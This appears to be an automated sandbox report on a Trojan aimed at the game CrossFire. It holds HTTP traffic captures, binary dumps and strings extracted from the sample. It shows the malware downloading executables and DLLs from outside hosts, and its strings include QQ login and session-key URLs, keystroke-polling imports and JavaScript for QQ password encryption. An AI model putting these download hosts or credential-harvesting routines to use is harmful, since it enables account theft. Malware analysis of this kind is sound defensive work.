CF-RAY: 3336b484d5935990-VIE
452..<html>.<head>.<meta HTTP-EQUIV="Content-Type" Cont
ent="text/html; charset=gb2312">.<title ID=titletext>......&l
t;/title>.</head>.<body bgcolor=white>.<table>.&l
t;tr>.<td ID=tableProps width=70 valign=top align=center>.<
;img ID=pagerrorImg src="pagerror.gif" width=36 height=48>.<td I
D=tablePropsWidth width=400>.<h1 ID=errortype style="font:14pt/1
6pt ...., verdana; color:#4e4e4e">.<P ID=Comment1> <P ID="
errorText">......7</h1>.<P ID=Comment2> <P ID="error
desc"><font style="font:9pt/12pt ....; color:black">.........
.........................................................<P ID=term
1>...............................................................&l
t;hr size=1 color="blue">.<P ID=message1>..



HEAD /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:22 GMT
Content-Type: text/plain
Content-Length: 563200
Connection: keep-alive
Set-Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681; expires=Mon, 19-Feb-18 03:41:21 GMT; path=/; domain=.zglhsw.com; HttpOnly
Last-Modified: Fri, 17 Feb 2017 17:23:56 GMT
Accept-Ranges: bytes
ETag: "f42d639e4289d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b3e146ed59ae-VIE
....


GET /adpub//01.txt HTTP/1.1


User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:22 GMT
Content-Type: text/plain
Content-Length: 563200
Connection: keep-alive
Last-Modified: Fri, 17 Feb 2017 17:23:56 GMT
Accept-Ranges: bytes
ETag: "f42d639e4289d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b3e5d77359ae-VIE
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PC.{.".(.".(
.".({Th(.".(..](.".(..i(.".(..h(V".(.Z@(.".(.ZP(.".(.".(.#.(..l(.".(..
Y(.".(..^(.".(Rich.".(................PE..L...oE]V....................
.................0....@..................................W....@.......
..........................@...,................................K...5..
................................@............0.. .....................
.......text............................... ..`.rdata.......0..........
............@..@.data...DO...0...*..................@....rsrc.........
.......4..............@..@.reloc...e.......f...2..............@..B....
......................................................................
......................................................................
......................................................................
......................................................................
............................................U..j.h..D.d.....P........0
F.3..E.VWP.E.d.....3...(....}.3...iE...0.....D.........@.....0........
.WWWWW.E.....4E...(...;.ul.{..C.......0...............D....r...0...P..
y.......D.........@.........0.....E......E.....H........J........M.Wh.
...WWQP..|4E...;.u/.{..C.......0.........G.....D....r...0...R.v...W.. 
...Q..$...Rh... V..$..... ..........4E...........$.......r&.{..C......
.0.....................4...h......M...WQ..L..............,...Rh......L
...PV..,......4E.9.,...tk....$......L....P...$......@..u. .P..L...
<<< skipped >>>

HEAD /aload/cp/NamuADLook.dll HTTP/1.1


User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:29 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b413e45159ae-VIE
....


GET /aload/cp/NamuADLook.dll HTTP/1.1


User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:30 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b41634a559ae-VIE
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........}........
.....N|......NH.)....NI.......a.......q.........}.............a......N
M......Ny......Nx......N......Rich....................PE..L...on.X....
.......!.....$...........{.......@....................................
..9.....@.............................H............P..................
.....`..@0...D..................................@............@........
.......................text....".......$.................. ..`.rdata..
X....@.......(..............@..@.data...DE....... ..................@.
...rsrc........P......................@..@.reloc...B...`...D..........
........@..B..........................................................
......................................................................
......................................................................
......................................................................
............................................U..j.h.#..d.....PQV. ...3.
P.E.d......u..E......E...........P..............E.....V.E......#......
...M.d......Y^..]...............U....u.3.]....P...@..u.VWj.j. .PSj.h..
.....@....3..G...............Q. J.....D?.Pj.V.Ht........H...@..u.WV .P
Sj.h.......@...}.Vh.t............t.V..M....._.....^]................U.
.QW....u._..].SVW..$A..j.j.j.j...SWj.h......@B...E.@P.}I.........u.^[_
..]..E.j.j.PVSWj.h......@B....0....P..I...@..u..]. ...V.......V..L....
...3.9A.^[..._..].U..Q..V.7.A....;.tI.~..S.^.|4..;.u.......E......
<<< skipped >>>


HEAD /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 19 Feb 2017 03:47:16 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive
HTTP/1.0 200 OK..Content-Length: 40..Content-Type: text/plain..Last-Mo
dified: Fri, 17 Feb 2017 05:52:26 GMT..Accept-Ranges: bytes..ETag: "1e
e814e288d21:1466"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..D
ate: Sun, 19 Feb 2017 03:47:16 GMT..X-Cache: HIT from ctzjwzs2..Via: 1
.0 ctzjwzs2 (squid)..Connection: keep-alive..



GET /blog/static/26993501420171281319931/ HTTP/1.1
Accept: */*
Referer: hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: baike2016.blog.163.com
Cache-Control: no-cache
Cookie: usertrack=c 5 hVipE9RwWyGzEX1iAg==


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 19 Feb 2017 03:41:14 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=6940DB1C86E784EA6CBDE5BD19B3ED96.yqblog8-8010; Domain=.blog.163.com; Path=/
b49..  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "ht
tp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..  <html xmlns
="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">..  <hea
d>..    <meta http-equiv="X-UA-Compatible" content="IE=7" />.
.    <meta http-equiv="content-type" content="text/html;charset=gbk
"/>..    <meta http-equiv="content-style-type" content="text/css
"/>..    <meta http-equiv="content-script-type" content="text/ja
vascript"/>..    <meta name="version" content="neblog-1.0"/>.
.    <script type="text/javascript">..      ..      ..      docu
ment.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=loca
tion.hash); ..      document.domain = location.hostname.replace(/^.*\.
([\w] \.[\w] )$/,'$1');..      window.focus();..      window.getMusicT
imeStamp=function(){return 'db4721d88d4cf492bc8388e52f709b99';};..    
..      //BLOG-647:....OS..............................      (function
(){..        window.setTimeout(function(){..          var _loginUserIc
on = document.getElementById('loginUserIcon');..          var _rsavata
rimg = document.getElementById('rsavatarimg');..          if(!!_loginU
serIcon){..            var _loaded1 = false;..            var _img1 = 
new Image();..            _img1.onload = function(){..                
_loaded1 = true;..                _img1.onload = null;..            };
..            _img1.src = _loginUserIcon.src;..            window.setT
imeout(function(){..              if(!_loaded1){..                
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3308:

`.rsrc
 ).pU
t$(SSh
~%UVW
u$SShe
wininet.dll
ole32.dll
kernel32.dll
user32.dll
User32.dll
Kernel32.dll
shell32.dll
gdiplus.dll
GdiPlus.dll
Ole32.dll
OleAut32.dll
oleaut32.dll
gzip.dll
ntdll.dll
gdi32.dll
Gdi32.dll
imm32.dll
OLEACC.DLL
advapi32.dll
shlwapi.dll
atl.dll
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ShellExecuteA
GetProcessHeap
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
GetWindowsDirectoryA
GdiplusShutdown
%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
1970-01-01 08:00:00
[VVV.111Ttt.com]
-URL:
%Program Files%\Internet Explorer\iexplore.exe
crossfire.exe
MsgBox
SysShadow.SubWnd
\exdui.dll
.rsrc
@V.Dv
.UmKm
4v %u
oft.XMLDOMnY
\dwmapi.dll
A715A0-6587-11D0-924A_20AFC7/
Leave.CoIn@alize
number is %d.
:"%s"
..0`%X
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
t=.VMV
%%fnW
,7Z.in
k`%u"]
T.ZQ2
CDKEY
CDKEY:
ND ED9MS?WC [H6WU<fL.aF6bB=dM2aN<iE?hO1jL=jP.gP4cP>iQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WB [H6WU<eL-bM;jP.cP>qN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND EE9LS?WC [I7WT<eL.bM;jP/dP>qN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
OB EE9LR?WC [I7WT<eL.bM:iP/dQ>qN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB FE9KR?WC [I7WT<eL.bM:iP/dQ>qN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRSWHE\NSWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTg^bfaIhdZir^saJxgX~p_fhhjmrmrhnqtxjermtzsjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[NSWXFWYX[^aXcI]dV]bciJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsivxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYXZ^aXcI]dV]bbiJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsjvxxz|
wW.Gg
NA EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
NA FE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE\OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
Z|.Gw
MA,FE9KR?WC*[I7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsjvxxz|
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsivxxz|
MA,EE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[OSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE\NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
l.er;
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsjvxyz|
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUBMRRWHE[NSWXFWYXZ^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
8`!%x
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bciJE`ORjYEhYVqNIr\IyZTg^bfaIhdYir_saJwgX|p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjYEhYVqNIr\IyZTg^bfaIidYir_saJwgXzq^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidYir_saJwgXzr^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WT<fL.bM;iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
.pQ\ a
.NaH-*
!)!!))!)-*1-(333:73_
%XE%Z
dj%d~
.PXF3
02/24/16
%UD-Od
lI*wt.KK
%4u3\2t
W.ctn
.yEXjmS
Yn7%X
..RZd
A$#%DR
Wx.xlu
n.mJ~f#
Il%UVl_
.mDB`
.ijWU5
w%SY<s
Wkbn%X
kEYH
&.kPd
(s.PKL
>%fZM
T2%xE
dQ]%U
#.mkTSx
.Ag.~
%f%%f
7".Fv
>.OsM
r.vDO
V2.6.0
\CF_data.ini
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
.text
`.rdata
@.data
CF_Helper.dll
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
@.reloc
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
7.84888<8@8
6 696?6{6
14686<6@6
5 5(50585
? ?$?,?@?`?
>$>0>4>8><>
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
RegOpenKeyExA
RegCreateKeyExA
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDD:\
01/04/17
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
skey=
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿFV
,.Ey)
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i  = 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512   data.length * chrsz);
return core_md5(opad.concat(hash), 512   128)
for (var i = 0; i < str.length * chrsz; i  = chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i  = chrsz) {
str  = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i  ) {
str  = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8   4)) & 15)   hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i  = 3) {
if (i * 8   j * 6 > binarray.length * 32) {
str  = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i   2) {
arr.push('\\x'   str.substr(i, 2))
arr = arr.join('');
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
var md5Pwd = isMd5 ? password: md5(password),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000'   vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len   rsaH1   TEA.strToBytes(salt)   vcodeLen   hexVcode);
TEA.initkey('');
return saltPwd.replace(/[\/\ =]/g,
'/': '-',
' ': '*',
'=': '_'
function getRSAEncryption(password, vcode, isMd5) {
var str1 = isMd5 ? password: md5(password);
var str2 = str1   vcode.toUpperCase();
var str3 = $.RSA.rsa_encrypt(str2);
$.RSA = function() {
while (z   aD < aC.length) {
t  = aC.substring(z, z   aD)   '\n';
return t   aC.substring(z, aC.length)
return '0'   t.toString(16)
return t.toString(16)
if (aG < aD.length   11) {
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength()   7) >> 3);
var aD = this.doPublic(t);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
